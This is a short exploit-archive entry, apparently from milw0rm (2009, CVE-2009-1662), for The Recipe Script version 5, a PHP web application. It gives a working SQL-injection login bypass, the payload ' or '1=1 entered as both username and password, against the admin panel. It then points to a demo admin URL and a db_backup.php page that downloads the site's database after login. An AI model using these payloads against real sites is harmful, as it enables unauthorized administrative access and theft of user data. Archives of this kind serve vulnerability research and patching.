The Recipe Script 5 - Authentication Bypass / Database Backup

Author: TiGeR-Dz
type: webapps
platform: php
port: 
date_added: 2009-05-07 
date_updated:  
verified: 1 
codes: OSVDB-54556;CVE-2009-1662 
tags: 
aliases:  
screenshot_url:  
application_url: 

-----------------------------------------------------
The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit
-----------------------------------------------------
Founder: TiGeR-Dz
script:The Recipe Script version 5
downlaod:http://recipescript.com/
-----------------------------------------------------------
-----------------------------------------------------------
(Auth Bypass) Remote Sql Injecion
--------------------------------
username:  ' or '1=1
Password:  ' or '1=1

demo:
-----
http://recipescript.com/demo/admin/index.php
------------------------------------------------------
Database Backup Exploit:
-------------------------
After login to administration panel to get Backup

http://recipescript.com/demo/admin/db_backup.php

--------------------------------------------------------

# milw0rm.com [2009-05-08]